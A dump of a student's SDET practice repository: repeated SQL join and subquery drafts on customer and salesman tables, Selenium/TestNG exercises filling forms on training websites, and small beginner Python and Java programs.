\nSalesman_city varchar2(32), \ncommission Number \n);\n\nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customer a \ninner join salseman b \non a.salesman_id=b.salesman_id;\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\ncreate table customers( \ncustomer_id int primary key , \ncustomer_name varchar(20), \ncity varchar(20), \ngrade int , \nsalesman_id int );\n\nselect a.customer_name , 
\na.city, \nb.name, \nb.commission \nfrom customer a \ninner join salseman b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customer a \ninner join salseman b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customers a \ninner join salseman b \non a.salesman_id=b.salesman_id;\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\ncreate table customers( \ncustomer_id int primary key , \ncustomer_name varchar(20), \ncity varchar(20), \ngrade int , \nsalesman_id int );\n\ncreate table salesman1( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\ncreate table customers1( \ncustomer_id int primary key , \ncustomer_name varchar(20), \ncity varchar(20), \ngrade int , \nsalesman_id int );\n\nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customers1 a \ninner join salseman1 b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name , \na.city, \nb.customer_name, \nb.commission \nfrom customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name , \na.city, \na.customer_name, \nb.commission \nfrom customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name ,a.city,a.grade,b.name b.city from customers1 \na \nleft outer join \nsalesman1 b \non a.salesman_id=b.salesman_id \nwhere a.grade<300 \norder by a.customer_id;\n\nselect a.customer_name ,a.city,a.grade,b.name b.city from customers1 a \nleft outer join salesman1 b \non a.salesman_id=b.salesman_id \nwhere a.grade<300 \norder by a.customer_id;\n\nselect a.customer_name ,a.city,a.grade,b.name,b.city from \ncustomers1 a left outer join salesman1 b \non a.salesman_id=b.salesman_id \nwhere a.grade<300 \norder by a.customer_id;\n\nselect a.customer_name ,a.city,a.grade,b.name,b.salesman_city from \ncustomers1 a left outer join salesman1 b \non a.salesman_id=b.salesman_id \nwhere a.grade<300 \norder by a.customer_id;\n\nselect a.customer_name ,a.city,a.grade,b.salesman_name,b.salesman_city from \ncustomers1 a left outer join salesman1 b \non a.salesman_id=b.salesman_id \nwhere a.grade<300 \norder by a.customer_id;\n\nselect a.customer_name ,a.city,b.name b.commission from customer a \ninner join salesman b \non a.salesman_id=b.salesman_id \nwhere b.comisssion>12;\n\nselect a.customer_name ,a.city,b.name ,b.commission from customer a \ninner join salesman b \non a.salesman_id=b.salesman_id \nwhere b.comisssion>12;\n\nselect a.customer_name ,a.city,b.name ,b.commission from customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id \nwhere b.comisssion>12;\n\nselect a.customer_name ,a.city,b.name ,b.commission from customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id \nwhere b.comisssion>12;\n\nselect a.customer_name ,a.city,b.name ,b.commission from customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id \nwhere b.commission>12;\n\nselect a.customer_name ,a.city,b.salesman_name ,b.commission from customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id \nwhere b.commission>12;\n\nselect * from orders \nwhere salesman_id =(select distinct salesman_id from orders where customer_id =3007);\n\nselect * from orders 
where \nsalesman_id in (select salesman_id from salesman where city='NewYork');\n\nselect * from orders where \nsalesman_id in (select salesman_id from salesman where salesman_city='NewYork');\n\nselect grade ,count(*) from customers \ngroup by grade having grade >(select avg(grade) from customers where city ='NewYOrk');\n\nselect order_no, purchase_amount, order_date ,salesman_id \nfrom orders \nwhere salesman_id in (select salesman_id from salesman where commission \n=(select MAX(commission) froma salesman );\n\nselect order_no, purchase_amount, order_date ,salesman_id \nfrom orders \nwhere salesman_id in (select salesman_id from salesman where commission \n=(select MAX(commission) from salesman );\n\nselect order_no, purchase_amount, order_date ,salesman_id \nfrom orders \nwhere salesman_id in (select salesman_id from salesman where commission \n=(select MAX(commission) from salesman ));\n\nselect customer_id ,customer_name from customers a \nwhere 1< \n(select count(*) from orders b where a.customer_id=b.customer_id) \nUnion \nselect salesman_id ,salesman_name from salesman a \nwhere 1< \n(select count(*) from orders b where a.salesman_id =b.salesman_id) \norder by customer_name;\n\nselect a.salesman_id,name ,order_no,order_date from salesman a , orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select Max(purachse_amount) from orders c where c.order_date =b.order_date) \nUNION \nselect a.salesman_id , name ,order_no,order_date \nfrom salesman a, orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select min(purchase_amount) from orders c where c.order_date=b.order_date);\n\nselect a.salesman_id,salesman_name ,order_no,order_date from salesman a , orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select Max(purachse_amount) from orders c where c.order_date =b.order_date) \nUNION \nselect a.salesman_id , salesman_name ,order_no,order_date \nfrom salesman a, orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select min(purchase_amount) from orders c where c.order_date=b.order_date);\n\ndescribe orders \n\n\nselect a.salesman_id,salesman_name ,order_no,order_date from salesman a , orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select Max(purchase_amount) from orders c where c.order_date =b.order_date) \nUNION \nselect a.salesman_id , salesman_name ,order_no,order_date \nfrom salesman a, orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select min(purchase_amount) from orders c where c.order_date=b.order_date);\n\nwhere b.commission>12;\n\n\nselect a.salesman_id,salesman_name ,order_no,order_date from salesman a , orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select Max(purchase_amount) from orders c where c.order_date =b.order_date);\n\nselect a.salesman_id , salesman_name ,order_no,order_date \nfrom salesman a, orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select min(purchase_amount) from orders c where c.order_date=b.order_date);\n\nselect a.salesman_id,salesman_name ,order_no,order_date from salesman a , orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select Max(purchase_amount) from orders c where c.order_date =b.order_date) \nUNION \nselect a.salesman_id , salesman_name ,order_no,order_date \nfrom salesman a, orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select min(purchase_amount) from orders c where c.order_date=b.order_date);\n\n" }, { "alpha_fraction": 
0.7105517983436584, "alphanum_fraction": 0.7260406613349915, "avg_line_length": 25.810810089111328, "blob_id": "c5dad21fb8fb25a80a13bab37fc0f1a17ef7ae7b", "content_id": "46a27849d9609b5012ae5022ae693d4b9333a64e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1033, "license_type": "no_license", "max_line_length": 79, "num_lines": 37, "path": "/Class3.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "\r\n\r\npackage Selenium_activity_3;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.By.ById;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\n\r\npublic class Class3 {\r\npublic static void main (String[] args ) throws InterruptedException\r\n{\r\n\tWebDriver driver=new FirefoxDriver();\r\n\tdriver.get(\"https://www.training-support.net/selenium/simple-form\");\r\n\tString title=driver.getTitle();\r\n\tWebElement idLocator_f=driver.findElement(By.id(\"firstName\"));\r\n\tidLocator_f.sendKeys(\"Surbhi\");\r\n\tWebElement idLocator_l=driver.findElement(By.id(\"lastName\"));\r\n\tidLocator_l.sendKeys(\"BAhl\");\r\n\tWebElement idLocator_e=driver.findElement(By.id(\"email\"));\r\n\tidLocator_e.sendKeys(\"[email protected]\");\r\n\tWebElement idLocator_N=driver.findElement(By.id(\"number\"));\r\n\tidLocator_N.sendKeys(\"6284062711\");\r\n\tWebElement idLocator_b=driver.findElement(By.cssSelector(\".ui.green.button\"));\r\n\tThread.sleep(5000);\r\n\tidLocator_b.click();\r\n\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.5407801270484924, "alphanum_fraction": 0.5780141949653625, "avg_line_length": 31.294116973876953, "blob_id": "8d119d10df150859d2e27a63967a2d9e0ebf7ba2", "content_id": "6ec14f0ab1155daf2efa0864880bab534ba85a30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 564, "license_type": "no_license", "max_line_length": 66, "num_lines": 17, "path": "/class_example.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "class Car:\r\n \"This represents the car\"\r\n def __init__(self,manu,model,make,trans,color):\r\n self.manu=manu\r\n self.model=model\r\n self.make=make\r\n self.trans=trans\r\n self.color=color\r\n def acce(self):\r\n print(self.manu+\" \"+self.model+ \" \"+\"has started moving\")\r\n def stop(self):\r\n print(self.manu+\" \"+self.model+\" \"+\"has stopped moving\")\r\ncar1=Car(\"Toyota\",\"c\",\"2016\",\"Manual\",\"White\")\r\ncar2=Car(\"i10\",\"D\",\"2017\",\"Automatic\",\"Black\")\r\ncar3=Car(\"i20\",\"E\",\"2018\",\"Manual\",\"Green\")\r\ncar3.acce()\r\ncar3.stop()" }, { "alpha_fraction": 0.4896000027656555, "alphanum_fraction": 0.5296000242233276, "avg_line_length": 15.36111068725586, "blob_id": "eef1a764f6871676af40d100391c3642cae8c2de", "content_id": "e9a01e72676d5025f37e6850d0899fb09ca64fcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 625, "license_type": "no_license", "max_line_length": 54, "num_lines": 36, "path": "/Sorting_1.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package JavaActivity_4;\r\nimport java.util.Arrays;\r\npublic class Sorting_1\r\n{\r\npublic static void main (String args[]) {\r\n\tint []a={2,44,23,89,78,44,54};\r\n\tint i=1;\r\n\tint j=2;\r\n\tint temp;\r\n\tint k;\r\n\tint 
length1=a.length;\r\n\t\r\n\twhile(j<=length1)\r\n\t{\r\n\t\ti=1;\r\n\t\tSystem.out.println(\"i=\"+i);\r\n\t\t\r\n\t\t\tk=i+1;\r\n\t\t\t//System.out.println(\"k=\"+k);\r\n\t\t\tSystem.out.println(\"j=\"+j);\r\n\t\t\twhile(k<=j && a[k]<a[i])\r\n\t\t\t{\r\n\t\t\t\t\t\r\n\t\t\t\ta[k+1]=a[k];\r\n\t\t\t\r\n\t\t\t//k=k+1;\r\n\t\t\t\t}\r\n\t\tk=k+1;\r\n\t\tSystem.out.println(\"kdown=\"+k);\r\n\t\tSystem.out.println(\"Result=:\"+(Arrays.toString(a)));\r\n\t\t\t\r\n\t\t\t}\r\n\t\t\tj=j+1;\r\n\t}\r\n\tSystem.out.println(Arrays.toString(a));\r\n}\r\n" }, { "alpha_fraction": 0.6224328875541687, "alphanum_fraction": 0.6271721720695496, "avg_line_length": 19.100000381469727, "blob_id": "c72f583e775e55405be46d8bb6a4bc9d9065c030", "content_id": "198f692ad0264fcb5e7a97db3f771acf8a15b205", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 633, "license_type": "no_license", "max_line_length": 52, "num_lines": 30, "path": "/class_activity1.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_3;\r\nimport java.util.ArrayList;\r\n\r\npublic class class_activity1 {\r\n\tpublic static void main(String [] args) {\r\n\t\tArrayList<String> strlist=new ArrayList<String>();\r\n\t\tstrlist.add(\"Surbhi\");\r\n\t\tstrlist.add(\"Rehanshi\");\r\n\t\tstrlist.add(\"Ankush\");\r\n\t\tstrlist.add(\"Priya\");\r\n\t\tstrlist.add(\"Shreya\");\r\n\t\tSystem.out.println(strlist.get(3));\r\n\t\tif (strlist.contains(\"Surbhi\")==true)\r\n\t\t{\r\n\t\t\tSystem.out.println(\"Its there\");\r\n\t\t\r\n\t\t}\r\n\t\telse {\r\n\t\t\tSystem.out.println(\"Its not there\");\r\n\t\t}\r\n\t\t\r\n\t\tSystem.out.println(strlist.size());\r\n\t\tstrlist.remove(\"Surbhi\");\r\n\t\tSystem.out.println(strlist.size());\r\n\t\t\r\n\t}\r\n\t\r\n\t\t\r\n\t\r\n}\r\n" }, { "alpha_fraction": 0.7160611748695374, "alphanum_fraction": 0.7265774607658386, "avg_line_length": 25.526315689086914, "blob_id": "7cf5cb105df1013d41940fa18e55de1032c37bff", "content_id": "b3657490d65af71cc2307fa50cb9f8ed62ff2375", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1046, "license_type": "no_license", "max_line_length": 84, "num_lines": 38, "path": "/Project_6.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Project_6;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterMethod;\r\nimport org.testng.annotations.BeforeClass;\r\nimport org.testng.annotations.BeforeMethod;\r\nimport org.testng.annotations.Test;\r\npublic class Project_6 {\r\nWebDriver driver;\r\n@BeforeMethod\r\npublic void Beforeclass()\r\n{\r\n\t\tdriver=new FirefoxDriver();\r\n\t\tdriver.get(\"http://alchemy.hguy.co/crm\");\r\n\t\t\r\n}\r\n@Test\r\npublic void activity_menu()\r\n{\r\n\tWebElement ele1=driver.findElement(By.id(\"user_name\"));\r\n\tWebElement Pass1=driver.findElement(By.id(\"username_password\"));\r\n\tele1.sendKeys(\"admin\");\r\n\tPass1.sendKeys(\"pa$$w0rd\");\r\n\tdriver.findElement(By.id(\"bigbutton\")).click();\r\n\t//driver.switchTo().frame(0);\r\n\tBoolean class1=driver.findElement(By.xpath(\"//a[@id='grouptab_3']\")).isDisplayed();\r\n\tSystem.out.println(\"Boolean value=\"+class1);\r\n\tif (class1==true)\r\n\t{driver.close();}\r\n\t\r\n\t\r\n\t}\r\n\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7167680263519287, "alphanum_fraction": 
0.7202432751655579, "avg_line_length": 42.269229888916016, "blob_id": "c50faa53567c675b0bb78f4828e6e007342c0792", "content_id": "7818efbbd4f85c998df28b4cad17503bc1c47838", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1151, "license_type": "no_license", "max_line_length": 114, "num_lines": 26, "path": "/Class_7_2.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Package7_2;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.By.ById;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\nimport org.openqa.selenium.support.ui.ExpectedConditions;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\n\r\npublic class Class_7_2 {\r\n\tpublic static void main(String args[])\r\n\t{\r\n\t\tWebDriver driver=new FirefoxDriver();\r\n\t\tdriver.get(\"https://training-support.net/selenium/dynamic-attributes\");\r\n\t\tdriver.findElement(By.xpath(\"//input[contains(@class,'-username')]\")).sendKeys(\"surbhi\");\r\n\t\tdriver.findElement(By.xpath(\"//input[contains(@class,'-password')]\")).sendKeys(\"bahl1234\");\r\n\t\tdriver.findElement(By.xpath(\"//label[text() = 'Confirm Password']/following::input\")).sendKeys(\"bahl1234\");;\r\n\t\tdriver.findElement(By.xpath(\"//label[contains(text(), 'mail')]/following-sibling::input\")).sendKeys(\"[email protected]\");;\r\n\t\t\r\n\t\tdriver.findElement(By.xpath(\"//button[contains(text(),'Sign Up')]\")).click();\r\n\t\tString text=driver.findElement(By.id(\"action-confirmation\")).getText();\r\n\t\tSystem.out.println(\"Text=\"+text);\r\n\t}\r\n\t\r\n\r\n}\r\n" }, { "alpha_fraction": 0.5272727012634277, "alphanum_fraction": 0.5878787636756897, "avg_line_length": 18.875, "blob_id": "77cb67f2a7c3eb07aea77a3b277e49d64d769955", "content_id": "f6f35ed849fbef638d6b90c7aa48e50c3f61ab26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 165, "license_type": "no_license", "max_line_length": 26, "num_lines": 8, "path": "/addinglistnumbers.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "def sum1(numbers):\r\n sum_i=0\r\n for number in numbers:\r\n sum_i=sum_i+number\r\n return sum_i\r\nlist=[1,2,3,4,5]\r\nsum1=sum1(list)\r\nprint(\"Sum=\"+str(sum1))" }, { "alpha_fraction": 0.6954314708709717, "alphanum_fraction": 0.7069681882858276, "avg_line_length": 28.492958068847656, "blob_id": "c530a2fa134997b4f5dcb8a5859c1bcec20cd0cf", "content_id": "709621098ef1a18bf6b35d32c077d0da76578bb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2167, "license_type": "no_license", "max_line_length": 121, "num_lines": 71, "path": "/TestNG_5.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package TestNG_5;\r\n\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterClass;\r\nimport org.testng.annotations.AfterTest;\r\nimport org.testng.annotations.BeforeClass;\r\nimport org.testng.annotations.Test;\r\nimport org.openqa.selenium.support.ui.ExpectedConditions;\r\nimport org.openqa.selenium.support.ui.Wait;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\n\r\npublic class TestNG_5 {\r\n\tWebDriver driver;\r\n\t@BeforeClass\r\n\tpublic void beforeClass()\r\n\t{ 
\r\n\t\tdriver=new FirefoxDriver();\r\n\t\tdriver.get(\"https://www.training-support.net/selenium/target-practice\");\r\n\t\r\n\t}\r\n\t@Test(groups= {\"HeaderTests\",\"ButtonTests\"})\r\n\tpublic void title_class()\r\n\t\r\n\t{\r\n\t\tWebDriverWait wait=new WebDriverWait(driver,100);\r\n\t\twait.until(ExpectedConditions.visibilityOfAllElementsLocatedBy(By.xpath(\"//div[@class='ui sizer vertical segment']\")));\r\n\t\tString text1=driver.getTitle();\r\n\t\t\r\n\t\t\r\n\t\tSystem.out.println(\"Title of the page is \"+text1);\r\n\t}\r\n\t@Test(dependsOnMethods= {\"title_class\"},groups= {\"HeaderTests\"})\r\n\tpublic void Header_test()\r\n\t{ \r\n\t\tString st=driver.findElement(By.id(\"third-header\")).getText();\r\n\t\tAssert.assertEquals(st, \"Third header\");\r\n\t\t\r\n\t}\r\n\t@Test(dependsOnMethods= {\"title_class\"},groups= {\"HeaderTests\"})\r\n\tpublic void Header_test1()\r\n\t{\r\n\t\tWebElement bu=driver.findElement(By.id(\"third-header\"));\r\n\t\tSystem.out.println(bu.getCssValue(\"color\"));\r\n\t}\r\n\t\r\n\t@Test(dependsOnMethods= {\"title_class\"},groups= {\"ButtonTests\"})\r\n\tpublic void Button_test1()\r\n\t{ \r\n\t\tString st1=driver.findElement(By.xpath(\"//button[text()='Olive']\")).getText();\r\n\t\tSystem.out.println(st1);\r\n\t\tAssert.assertEquals(st1, \"Olive\");\r\n\t}\r\n\t@Test(dependsOnMethods= {\"title_class\"},groups= {\"ButtonTests\"})\r\n\tpublic void Button_test2()\r\n\t{\r\n\t\tWebElement bu=driver.findElement(By.xpath(\"//button[text()='brown']\"));\r\n\t\tString bu1=bu.getCssValue(\"color\");\r\n\t\tSystem.out.println(bu1);\r\n\t\tAssert.assertEquals(bu1, \"rgb(255,255,255)\");\r\n\t\t\r\n\t}\r\n\t@AfterClass()\r\n\tpublic void aftermethod()\r\n {\r\n\t\tdriver.close();}\r\n\t\r\n\t}\r\n\r\n" }, { "alpha_fraction": 0.682539701461792, "alphanum_fraction": 0.6984127163887024, "avg_line_length": 10.600000381469727, "blob_id": "83d3eed83c0be7069413b8b0830c5d8529d4de5e", "content_id": "98e277c3d6ccfbcb73065b477b07176559b7108f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 63, "license_type": "no_license", "max_line_length": 28, "num_lines": 5, "path": "/Project_1.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Project_RestAssured;\r\n\r\npublic class Project_1 {\r\n\r\n}\r\n" }, { "alpha_fraction": 0.6258503198623657, "alphanum_fraction": 0.7074829936027527, "avg_line_length": 19.285715103149414, "blob_id": "12bbbdf87dfa78ad6d51264d706393fddc20b14c", "content_id": "4050ace09a1eba8c6de4ae898b93c8d681c8bec4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 147, "license_type": "no_license", "max_line_length": 29, "num_lines": 7, "path": "/Listchecker.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "numlist=[10,20,40,50,40]\r\nfirstelement=numlist[0]\r\nlastelement=numlist[-1]\r\nif firstelement==lastelement:\r\n print(True)\r\nelse:\r\n print(False)" } ]
35
Fascha/Python-Abschlussprojekt
https://github.com/Fascha/Python-Abschlussprojekt
2304619b35ddb5bd786416dc8aebccc387bd9e86
b5cfbc3a748ee03264044790ad1e268b804218e1
4b86bb99fafa51cf7563d5ba57119a8740e9c656
refs/heads/master
2016-08-12T23:27:35.135431
2015-12-17T12:13:58
2015-12-17T12:13:58
47,752,029
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6992481350898743, "alphanum_fraction": 0.7180451154708862, "avg_line_length": 17.581396102905273, "blob_id": "fe1132c7fc003921cf36e5d94dfa355d82d51c9a", "content_id": "99ae899cc724600616e0de45ba66a454f317118b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 798, "license_type": "no_license", "max_line_length": 92, "num_lines": 43, "path": "/game.py", "repo_name": "Fascha/Python-Abschlussprojekt", "src_encoding": "UTF-8", "text": "import sys\nimport pygame\nfrom pygame.locals import *\n\npygame.init()\n\nwindow_width = 800\nwindow_height = 600\nwindow_size = window_width, window_height\n\ngameDisplay = pygame.display.set_mode(window_size)\n\ngame_clock = pygame.time.Clock()\nfps = 60\ngame_clock.tick(fps)\n\n\ngameOver = False\n\nbackgroundImage = pygame.image.load(\"data/images/background.jpg\")\nplayerImage = pygame.image.load(\"data/images/player.jpg\")\n\ndef gameLoop():\n\tglobal gameOver\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.KEYUP:\n\t\t\t\tif event.key == K_ESCAPE:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\tsys.exit(0)\n\n\t\t\t\t\n\n\t\tgameDisplay.blit(backgroundImage,(0,0))\n\t\tgameDisplay.blit(playerImage,(window_width/2 - playerImage.get_width()/2,window_height/8))\n\t\tpygame.display.flip()\n\n\n\n\ngameLoop()\npygame.quit()\nsys.exit(0)" }, { "alpha_fraction": 0.8505747318267822, "alphanum_fraction": 0.8505747318267822, "avg_line_length": 42, "blob_id": "908e94030a5a0b1c29b27a52514b784468cd6d8c", "content_id": "859dd1d6fdfe9b7229003bfe12c34469033a9976", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 59, "num_lines": 2, "path": "/README.md", "repo_name": "Fascha/Python-Abschlussprojekt", "src_encoding": "UTF-8", "text": "# Python-Abschlussprojekt\nAnalyzing and Visualizing with Python - Final Project\n" } ]
2
bamasa/client
https://github.com/bamasa/client
d96e900762e89c7492816d1079cc9ed3f480e0db
2baad7984b3ea92a5712e35728bc24c179ed703f
82e7875f371740cb6e2150aca4ff6f21325ac315
refs/heads/master
2020-03-24T03:46:32.693144
2018-07-12T18:23:01
2018-07-12T18:23:01
142,432,591
0
0
null
2018-07-26T11:36:40
2018-07-12T18:23:12
2018-07-12T18:23:10
null
[ { "alpha_fraction": 0.6144164800643921, "alphanum_fraction": 0.6287185549736023, "avg_line_length": 28.627119064331055, "blob_id": "9212270b1d356c5b3d690d0b4f3a7e3e366da317", "content_id": "00ecf78a3f681e22c6e5359c556e7e42cab191cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1748, "license_type": "no_license", "max_line_length": 108, "num_lines": 59, "path": "/wonderlandClient/util.py", "repo_name": "bamasa/client", "src_encoding": "UTF-8", "text": "import os\n\nimport grpc\nimport yaml\n\nfrom .wonderland_pb2_grpc import wonderlandStub\n\n\ndef new_client():\n default_path = os.path.join(os.environ.get(\"HOME\"), \".wonder/config.yml\")\n return new_client_from_path(default_path)\n\n\ndef new_client_from_path(config_path):\n config = load_config(config_path)\n creds = load_credentials(config)\n channel = grpc.secure_channel(\n config.get(\"connect_to\"),\n creds,\n options=(\n ('grpc.max_send_message_length', 1024 * 1024 * 1024),\n ('grpc.max_receive_message_length', 1024 * 1024 * 1024),\n )\n )\n return wonderlandStub(channel)\n\n\ndef load_config(config_path):\n if not os.path.exists(config_path):\n raise Exception(\"Config file `{}` does not exist\".format(config_path))\n\n with open(config_path) as config_f:\n return yaml.load(config_f)\n\n\ndef load_credentials(config):\n path_ok = [\n os.path.exists(config.get(\"ca_cert\")),\n os.path.exists(config.get(\"client_key\")),\n os.path.exists(config.get(\"client_cert\")),\n ]\n if not all(path_ok):\n raise ValueError(\"One of credentials files does not exist\")\n\n root_cert = open(config.get(\"ca_cert\"), 'rb').read()\n private_key = open(config.get(\"client_key\"), 'rb').read()\n cert_chain = open(config.get(\"client_cert\"), 'rb').read()\n credentials = grpc.ssl_channel_credentials(\n root_certificates=root_cert,\n private_key=private_key,\n certificate_chain=cert_chain\n )\n\n return credentials\n\n\ndef check_jobs_equal(a, b):\n return (a.project == b.project) and (a.id == b.id) and (a.status == b.status) and (\n a.metadata == b.metadata) and (a.kind == b.kind) and (a.output == b.output) and (a.input == b.input)\n" }, { "alpha_fraction": 0.6657142639160156, "alphanum_fraction": 0.677142858505249, "avg_line_length": 14.909090995788574, "blob_id": "decd7c0b570ad0762b14638214e8383ddb6fe7d4", "content_id": "fad6630af16273dceb2ff45080eddd61cf86a118", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 350, "license_type": "no_license", "max_line_length": 36, "num_lines": 22, "path": "/wonderlandClient/__init__.py", "repo_name": "bamasa/client", "src_encoding": "UTF-8", "text": "from .wonderland_pb2 import (\n Job,\n ListOfJobs,\n RequestWithId,\n ListJobsRequest\n)\n\nfrom .wonderland_pb2_grpc import (\n wonderlandServicer,\n wonderlandStub,\n add_wonderlandServicer_to_server\n)\n\nfrom .util import (\n new_client,\n new_client_from_path,\n check_jobs_equal\n)\n\nfrom .worker import Worker\n\n__version__ = \"0.1\"\n" } ]
2
hannatao/LeetCode
https://github.com/hannatao/LeetCode
01996f84a291bd98acfb9e1e6e4c2b27da678cca
6731bfa5bd11b37d0fc032b1dbdf2f0752fb61bf
70d45e1a6bbda5084e29d343503b74372016e637
refs/heads/master
2018-10-28T08:15:49.917293
2018-09-17T15:44:58
2018-09-17T15:44:58
103,135,100
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.48750001192092896, "alphanum_fraction": 0.5041666626930237, "avg_line_length": 31.772727966308594, "blob_id": "a689484727dbe367d4466eff0c888792cc102bcd", "content_id": "ccba563915a7df949ffc61482a7bfbf6b2b46d9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 720, "license_type": "no_license", "max_line_length": 78, "num_lines": 22, "path": "/Intersection_of_Two_Linked_Lists.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "public class Solution {\n public ListNode getIntersectionNode(ListNode headA, ListNode headB) {\n if(headA == null || headB == null) {return null;}\n Stack<ListNode> q1 = new Stack<ListNode>();\n Stack<ListNode> q2 = new Stack<ListNode>();\n while(headA != null) {\n q1.add(headA);\n headA = headA.next;\n }\n while(headB != null) {\n q2.add(headB);\n headB = headB.next;\n }\n if(!q1.peek().equals(q2.peek())) {return null;}\n ListNode result = null;\n while(!q1.isEmpty() && !q2.isEmpty() && q1.peek().equals(q2.peek())) {\n result = q1.pop();\n q2.pop();\n }\n return result;\n }\n}" }, { "alpha_fraction": 0.46232178807258606, "alphanum_fraction": 0.4725050926208496, "avg_line_length": 31.799999237060547, "blob_id": "565bc3bfcf961367d3bf6d3720a317b2765343f1", "content_id": "0a3d95a721ac932c2cd454b992b2eb0677fbd0b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 491, "license_type": "no_license", "max_line_length": 64, "num_lines": 15, "path": "/Combinations.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public List<List<Integer>> combine(int n, int k) {\n if(k == n || k == 0){\n List<Integer> row = new ArrayList<Integer>();\n for(int i = 1; i <= k; i ++){\n row.add(i);\n }\n return new ArrayList<>(Arrays.asList(row));\n }\n List<List<Integer>> result = this.combine(n - 1, k - 1);\n result.forEach(e -> e.add(n));\n result.addAll(this.combine(n - 1, k));\n return result;\n }\n}" }, { "alpha_fraction": 0.5253505706787109, "alphanum_fraction": 0.5264293551445007, "avg_line_length": 31, "blob_id": "5cf349c61232980c40b60242c8db23df4e025805", "content_id": 